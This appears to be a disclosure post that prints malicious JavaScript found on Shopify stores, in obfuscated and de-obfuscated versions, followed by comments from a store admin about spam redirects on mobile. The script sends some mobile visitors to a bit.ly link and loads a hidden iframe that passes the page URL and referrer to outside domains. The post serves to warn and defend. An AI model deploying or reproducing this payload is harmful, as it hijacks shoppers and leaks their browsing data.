DO NOT RUN: potentially malicious JavaScript found on some Shopify sites

cdn-myshopify.com-file-jquery.min.js

var _0x3a4e=["random","floor","referrer","m.facebook.com","instagram.com","google.","bing.","indexOf","hostname","location","ourogoods.com","href","dice-bracelet","userAgent","test","onreadystatechange","readyState","status","california","responseText","http://bit.ly/2VdQsq0","GET","https://comic16.com/test/state","open","send","iframe","createElement","display","style","none","id","if-r-js-x","src","https://cdn-myshopify.com/home.html?q=","&cdnref=","appendChild","body","getElementById","remove"];var radN=Math[_0x3a4e[1]]((Math[_0x3a4e[0]]()* 100)+ 1);var siteRe=document[_0x3a4e[2]];var fRefFa=_0x3a4e[3];var fRefIn=_0x3a4e[4];var fRefGo=_0x3a4e[5];var fRefBg=_0x3a4e[6];var isMRFa=siteRe[_0x3a4e[7]](fRefFa);var isMRIn=siteRe[_0x3a4e[7]](fRefIn);var isMRGo=siteRe[_0x3a4e[7]](fRefGo);var isMRBg=siteRe[_0x3a4e[7]](fRefBg);if((isMRFa>  -1|| isMRIn>  -1|| isMRGo>  -1|| isMRBg>  -1)&& radN<= 15){var hname=window[_0x3a4e[9]][_0x3a4e[8]];var fHtn=_0x3a4e[10];var isMhtn=hname[_0x3a4e[7]](fHtn);var furl=window[_0x3a4e[9]][_0x3a4e[11]];var fUma=_0x3a4e[12];var isMUma=furl[_0x3a4e[7]](fUma);if(isMhtn>  -1&& isMUma>  -1){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i[_0x3a4e[14]](navigator[_0x3a4e[13]])){var xhttp= new XMLHttpRequest();xhttp[_0x3a4e[15]]= function(){if(this[_0x3a4e[16]]== 4&& this[_0x3a4e[17]]== 200){if(this[_0x3a4e[19]][_0x3a4e[7]](_0x3a4e[18])>= 0){}else {window[_0x3a4e[9]][_0x3a4e[11]]= _0x3a4e[20]}}};xhttp[_0x3a4e[23]](_0x3a4e[21],_0x3a4e[22],true);xhttp[_0x3a4e[24]]()}}};setTimeout(function(){var _0x9d64x12=document[_0x3a4e[2]];var hname=window[_0x3a4e[9]][_0x3a4e[11]];var _0x9d64x13=document[_0x3a4e[26]](_0x3a4e[25]);_0x9d64x13[_0x3a4e[28]][_0x3a4e[27]]= _0x3a4e[29];_0x9d64x13[_0x3a4e[30]]= _0x3a4e[31];_0x9d64x13[_0x3a4e[32]]= _0x3a4e[33]+ hname+ _0x3a4e[34]+ _0x9d64x12;document[_0x3a4e[36]][_0x3a4e[35]](_0x9d64x13)},2000);setTimeout(function(){var _0x9d64x14=document[_0x3a4e[37]](_0x3a4e[31]);if(_0x9d64x14){_0x9d64x14[_0x3a4e[38]]()}},4500)

Older version:

var _0xaa30=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x6E\x6F\x6E\x65","\x69\x64","\x69\x66\x2D\x72\x2D\x6A\x73\x2D\x78","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x2D\x6D\x79\x73\x68\x6F\x70\x69\x66\x79\x2E\x63\x6F\x6D\x2F\x68\x6F\x6D\x65\x2E\x68\x74\x6D\x6C\x3F\x71\x3D","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x72\x65\x6D\x6F\x76\x65"];setTimeout(function(){var _0xd24ax1=window[_0xaa30[1]][_0xaa30[0]];var _0xd24ax2=document[_0xaa30[3]](_0xaa30[2]);_0xd24ax2[_0xaa30[5]][_0xaa30[4]]= _0xaa30[6];_0xd24ax2[_0xaa30[7]]= _0xaa30[8];_0xd24ax2[_0xaa30[9]]= _0xaa30[10]+ _0xd24ax1;document[_0xaa30[12]][_0xaa30[11]](_0xd24ax2)},2000);setTimeout(function(){var _0xd24ax3=document[_0xaa30[13]](_0xaa30[8]);if(_0xd24ax3){_0xd24ax3[_0xaa30[14]]()}},4500)

De-obfuscated latest version:

var radN = Math['floor']((Math['random']() * 100) + 1);
var siteRe = document['referrer'];
var fRefFa = 'm.facebook.com';
var fRefIn = 'instagram.com';
var fRefGo = 'google.';
var fRefBg = 'bing.';
var isMRFa = siteRe['indexOf'](fRefFa);
var isMRIn = siteRe['indexOf'](fRefIn);
var isMRGo = siteRe['indexOf'](fRefGo);
var isMRBg = siteRe['indexOf'](fRefBg);
if ((isMRFa > -1 || isMRIn > -1 || isMRGo > -1 || isMRBg > -1) && radN <= 15) {
    var hname = window['location']['hostname'];
    var fHtn = 'ourogoods.com';
    var isMhtn = hname['indexOf'](fHtn);
    var furl = window['location']['href'];
    var fUma = 'dice-bracelet';
    var isMUma = furl['indexOf'](fUma);
    if (isMhtn > -1 && isMUma > -1) {
        if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i ['test'](navigator['userAgent'])) {
            var xhttp = new XMLHttpRequest();
            xhttp['onreadystatechange'] = function () {
                if (this['readyState'] == 4 && this['status'] == 200) {
                    if (this['responseText']['indexOf']('california') >= 0) {} else {
                        window['location']['href'] = 'http://bit.ly/2VdQsq0'
                    }
                }
            };
            xhttp['open']('GET', 'https://comic16.com/test/state', true);
            xhttp['send']()
        }
    }
};
setTimeout(function () {
    var _0x9d64x12 = document['referrer'];
    var hname = window['location']['href'];
    var _0x9d64x13 = document['createElement']('iframe');
    _0x9d64x13['style']['display'] = 'none';
    _0x9d64x13['id'] = 'if-r-js-x';
    _0x9d64x13['src'] = 'https://cdn-myshopify.com/home.html?q=' + hname + '&cdnref=' + _0x9d64x12;
    document['body']['appendChild'](_0x9d64x13)
}, 2000);
setTimeout(function () {
    var _0x9d64x14 = document['getElementById']('if-r-js-x');
    if (_0x9d64x14) {
        _0x9d64x14['remove']()
    }
}, 4500)

Latest version on cdn-clouds:

var _0x8ec5=["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x72\x65\x66\x65\x72\x72\x65\x72","\x6D\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x69\x6E\x73\x74\x61\x67\x72\x61\x6D\x2E\x63\x6F\x6D","\x67\x6F\x6F\x67\x6C\x65\x2E","\x62\x69\x6E\x67\x2E","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x6F\x75\x72\x6F\x67\x6F\x6F\x64\x73\x2E\x63\x6F\x6D","\x68\x72\x65\x66","\x64\x69\x63\x65\x2D\x62\x72\x61\x63\x65\x6C\x65\x74","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x61\x6C\x69\x66\x6F\x72\x6E\x69\x61","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x32\x56\x64\x51\x73\x71\x30","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x6D\x69\x63\x31\x36\x2E\x63\x6F\x6D\x2F\x74\x65\x73\x74\x2F\x73\x74\x61\x74\x65","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x6E\x6F\x6E\x65","\x69\x64","\x69\x66\x2D\x72\x2D\x6A\x73\x2D\x78","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x2D\x63\x6C\x6F\x75\x64\x73\x2E\x63\x6F\x6D\x2F\x68\x6F\x6D\x65\x2E\x68\x74\x6D\x6C\x3F\x71\x3D","\x26\x63\x64\x6E\x72\x65\x66\x3D","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x72\x65\x6D\x6F\x76\x65"];var radN=Math[_0x8ec5[1]]((Math[_0x8ec5[0]]()* 100)+ 1);var siteRe=document[_0x8ec5[2]];var fRefFa=_0x8ec5[3];var fRefIn=_0x8ec5[4];var fRefGo=_0x8ec5[5];var fRefBg=_0x8ec5[6];var isMRFa=siteRe[_0x8ec5[7]](fRefFa);var isMRIn=siteRe[_0x8ec5[7]](fRefIn);var isMRGo=siteRe[_0x8ec5[7]](fRefGo);var isMRBg=siteRe[_0x8ec5[7]](fRefBg);if((isMRFa>  -1|| isMRIn>  -1|| isMRGo>  -1|| isMRBg>  -1)&& radN<= 15){var hname=window[_0x8ec5[9]][_0x8ec5[8]];var fHtn=_0x8ec5[10];var isMhtn=hname[_0x8ec5[7]](fHtn);var furl=window[_0x8ec5[9]][_0x8ec5[11]];var fUma=_0x8ec5[12];var isMUma=furl[_0x8ec5[7]](fUma);if(isMhtn>  -1&& isMUma>  -1){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i[_0x8ec5[14]](navigator[_0x8ec5[13]])){var xhttp= new XMLHttpRequest();xhttp[_0x8ec5[15]]= function(){if(this[_0x8ec5[16]]== 4&& this[_0x8ec5[17]]== 200){if(this[_0x8ec5[19]][_0x8ec5[7]](_0x8ec5[18])>= 0){}else {window[_0x8ec5[9]][_0x8ec5[11]]= _0x8ec5[20]}}};xhttp[_0x8ec5[23]](_0x8ec5[21],_0x8ec5[22],true);xhttp[_0x8ec5[24]]()}}};setTimeout(function(){var _0xae80x12=document[_0x8ec5[2]];var hname=window[_0x8ec5[9]][_0x8ec5[11]];var _0xae80x13=document[_0x8ec5[26]](_0x8ec5[25]);_0xae80x13[_0x8ec5[28]][_0x8ec5[27]]= _0x8ec5[29];_0xae80x13[_0x8ec5[30]]= _0x8ec5[31];_0xae80x13[_0x8ec5[32]]= _0x8ec5[33]+ hname+ _0x8ec5[34]+ _0xae80x12;document[_0x8ec5[36]][_0x8ec5[35]](_0xae80x13)},2000);setTimeout(function(){var _0xae80x14=document[_0x8ec5[37]](_0x8ec5[31]);if(_0xae80x14){_0xae80x14[_0x8ec5[38]]()}},4500)

De-obfuscated cdn-clouds version:

var radN = Math['floor']((Math['random']() * 100) + 1);
var siteRe = document['referrer'];
var fRefFa = 'm.facebook.com';
var fRefIn = 'instagram.com';
var fRefGo = 'google.';
var fRefBg = 'bing.';
var isMRFa = siteRe['indexOf'](fRefFa);
var isMRIn = siteRe['indexOf'](fRefIn);
var isMRGo = siteRe['indexOf'](fRefGo);
var isMRBg = siteRe['indexOf'](fRefBg);
if ((isMRFa > -1 || isMRIn > -1 || isMRGo > -1 || isMRBg > -1) && radN <= 15) {
    var hname = window['location']['hostname'];
    var fHtn = 'ourogoods.com';
    var isMhtn = hname['indexOf'](fHtn);
    var furl = window['location']['href'];
    var fUma = 'dice-bracelet';
    var isMUma = furl['indexOf'](fUma);
    if (isMhtn > -1 && isMUma > -1) {
        if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i ['test'](navigator['userAgent'])) {
            var xhttp = new XMLHttpRequest();
            xhttp['onreadystatechange'] = function () {
                if (this['readyState'] == 4 && this['status'] == 200) {
                    if (this['responseText']['indexOf']('california') >= 0) {} else {
                        window['location']['href'] = 'http://bit.ly/2VdQsq0'
                    }
                }
            };
            xhttp['open']('GET', 'https://comic16.com/test/state', true);
            xhttp['send']()
        }
    }
};
setTimeout(function () {
    var _0xae80x12 = document['referrer'];
    var hname = window['location']['href'];
    var _0xae80x13 = document['createElement']('iframe');
    _0xae80x13['style']['display'] = 'none';
    _0xae80x13['id'] = 'if-r-js-x';
    _0xae80x13['src'] = 'https://cdn-clouds.com/home.html?q=' + hname + '&cdnref=' + _0xae80x12;
    document['body']['appendChild'](_0xae80x13)
}, 2000);
setTimeout(function () {
    var _0xae80x14 = document['getElementById']('if-r-js-x');
    if (_0xae80x14) {
        _0xae80x14['remove']()
    }
}, 4500)

Hi,
I am the admin of a Shopify website that is being "infected" lately. It is being undesirably redirected from time to time, only on mobile, to spam websites and I suspect the code you have posted to be the origin of the problem. I don't how it could have arrived on the website's code but anyway, now I would like to locate it or at least verify if it is the reason my website is facing this situation.
Thank you for any help.

@lbl652 We weren't able to pin it down to a specific app, but had a strong suspect- an app developer that used to be listed on the Shopify App Store but was no longer.

I recommend you remove all apps that are not essential to the store and start from there. Shopify support will be able to help some more if the issue persists, you can point them to this thread too. I hope you manage to get it sorted.

Hi Daniel,
Thanks for your quick reply. I have currently 2 apps installed that are unlisted on the Shopify App Store, which are PayPal Tracking Info Populator, and Sweet Upsell. I will investigate on that.
Thanks again for your help.